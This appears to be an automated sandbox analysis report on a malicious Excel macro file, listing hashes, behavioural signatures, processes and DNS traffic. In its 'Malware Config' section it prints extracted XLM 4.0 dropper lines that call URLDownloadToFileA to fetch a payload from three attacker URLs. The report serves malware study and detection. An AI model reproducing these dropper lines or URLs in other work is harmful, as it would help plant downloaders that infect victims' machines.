Analysis
-
max time kernel
184s -
max time network
191s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
12-05-2022 16:29
Behavioral task
behavioral1
Sample
?i=1zjqrjjyu.xlsm
Resource
win7-20220414-en
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
?i=1zjqrjjyu.xlsm
Resource
win10v2004-20220414-en
windows10-2004_x64
0 signatures
0 seconds
General
-
Target
?i=1zjqrjjyu.xlsm
-
Size
83KB
-
MD5
cf82eec9632dc53d54c38f1d7b8a1b71
-
SHA1
7b7e3339a8e857f1525341c074571ee7d7e9dd7f
-
SHA256
9fbfeb3873dee627be46cf7c10015435d027d718dd42a7842badd45e590f782b
-
SHA512
346297dc7ce5b9caf84b766e40339372012f3401f010a7473a52cdb9a56027bdef53869a7aa543b67aa890536d442ed718583b04a7328302a164b7dba6f6dd29
Score
10/10
Malware Config
Extracted
Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://yuanbinglun.com/www.yuanbinglun.com/7kKwqmxRWQK0OLi/", "..\dwa.ocx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://laserjetprintersreview.xyz/wp-includes/BJ6yUJ/", "..\dwa.ocx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://2021.posadamision.com/wp-admin/IoqaL08/", "..\dwa.ocx")
URLs
xlm40.dropper
http://yuanbinglun.com/www.yuanbinglun.com/7kKwqmxRWQK0OLi/
xlm40.dropper
http://laserjetprintersreview.xyz/wp-includes/BJ6yUJ/
xlm40.dropper
http://2021.posadamision.com/wp-admin/IoqaL08/
Signatures
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2284 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 2284 EXCEL.EXE 2284 EXCEL.EXE 2284 EXCEL.EXE 2284 EXCEL.EXE 2284 EXCEL.EXE 2284 EXCEL.EXE 2284 EXCEL.EXE 2284 EXCEL.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\_i=1zjqrjjyu.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2284
Network
-
Remote address:8.8.8.8:53Request96.108.152.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestyuanbinglun.comIN AResponseyuanbinglun.comIN A101.200.218.166
-
Remote address:8.8.8.8:53Request2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestlaserjetprintersreview.xyzIN AResponse
-
Remote address:8.8.8.8:53Request2021.posadamision.comIN AResponse
-
46 B 71 B 1 1
-
46 B 71 B 1 1
-
46 B 71 B 1 1
-
46 B 71 B 1 1
-
46 B 40 B 1 1
-
322 B 7
-
260 B 5
-
322 B 7
-
260 B 5
-
260 B 5
-
322 B 7
-
260 B 5
-
322 B 7
-
322 B 7
-
72 B 146 B 1 1
DNS Request
96.108.152.52.in-addr.arpa
-
61 B 77 B 1 1
DNS Request
yuanbinglun.com
DNS Response
101.200.218.166
-
118 B 204 B 1 1
DNS Request
2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
-
72 B 137 B 1 1
DNS Request
laserjetprintersreview.xyz
-
67 B 143 B 1 1
DNS Request
2021.posadamision.com